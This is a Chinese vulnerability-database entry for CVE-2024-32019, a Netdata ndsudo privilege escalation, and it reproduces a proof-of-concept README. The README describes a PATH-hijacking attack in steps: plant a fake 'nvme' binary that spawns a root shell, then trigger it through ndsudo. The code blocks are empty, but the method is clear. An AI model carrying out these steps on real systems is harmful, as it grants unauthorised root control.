Netdata ndsudo 权限提升漏洞
漏洞信息
漏洞名称: Netdata ndsudo 权限提升漏洞
漏洞编号:
- CVE: CVE-2024-32019
漏洞类型: 权限提升
漏洞等级: 高危
漏洞描述: Netdata是一个开源的实时性能和健康监控工具,广泛应用于服务器和云环境中,用于监控系统资源、应用程序和服务。它提供了一个用户友好的Web界面,使得用户可以轻松地查看和分析监控数据。Netdata的ndsudo工具是一个本地特权提升工具,允许用户以root权限执行特定命令。然而,由于ndsudo工具的设计缺陷,攻击者可以通过注入恶意二进制文件到用户的PATH环境变量中,利用ndsudo执行恶意命令,从而实现本地权限提升。这种漏洞的根源在于ndsudo工具对用户提供的命令缺乏足够的验证和限制,导致攻击者可以绕过预期的安全限制。这种漏洞的存在使得攻击者可以在不需要任何认证的情况下,利用本地访问权限提升到root权限,从而完全控制系统。这不仅可能导致敏感数据的泄露,还可能被用于进一步的攻击活动,如安装后门、修改系统配置等。由于Netdata的广泛使用,这种漏洞的影响范围较大,需要用户及时更新到修复版本以避免潜在的安全风险。
产品厂商: Netdata
产品名称: Netdata
来源: https://github.com/AzureADTrent/CVE-2024-32019-POC
类型: CVE-2024:github search
仓库文件
- README.md
- poc.c
来源概述
Privilege Escalation via ndsudo (Netdata Local Exploit)
This POC is used to exploit a vulnerable ndsudo utility bundled with Netdata to escalate local privileges to root. The exploit works by injecting a malicious binary into the user’s PATH that impersonates a trusted command (nvme) and is executed with root privileges by ndsudo.
Prerequisites & Assumptions
You have local shell access on the target system.
You can execute the following command but it fails with a “not found” or similar error:
1
./ndsudo nvme-list
1. Compile the Malicious Payload
On your attacker machine (or the vulnerable system if it has a compiler), compile a malicious binary (for example, from a file poc.c):
1 | |
This binary should be crafted to spawn a root shell or execute arbitrary commands with root privileges.
2. Transfer the Payload to the Target System
Move or upload the compiled nvme binary to a directory writable by your user, such as /tmp:
1 | |
3. Prepare the Payload for Execution
On the target system, make sure the binary is executable and prepend its directory to your PATH:
1 | |
This ensures ndsudo will resolve and execute your malicious nvme instead of the legitimate one.
4. Trigger ndsudo to Execute Your Payload
Run the vulnerable command to trigger ndsudo:
1 | |
Resources
- Netdata Github Advisory: https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93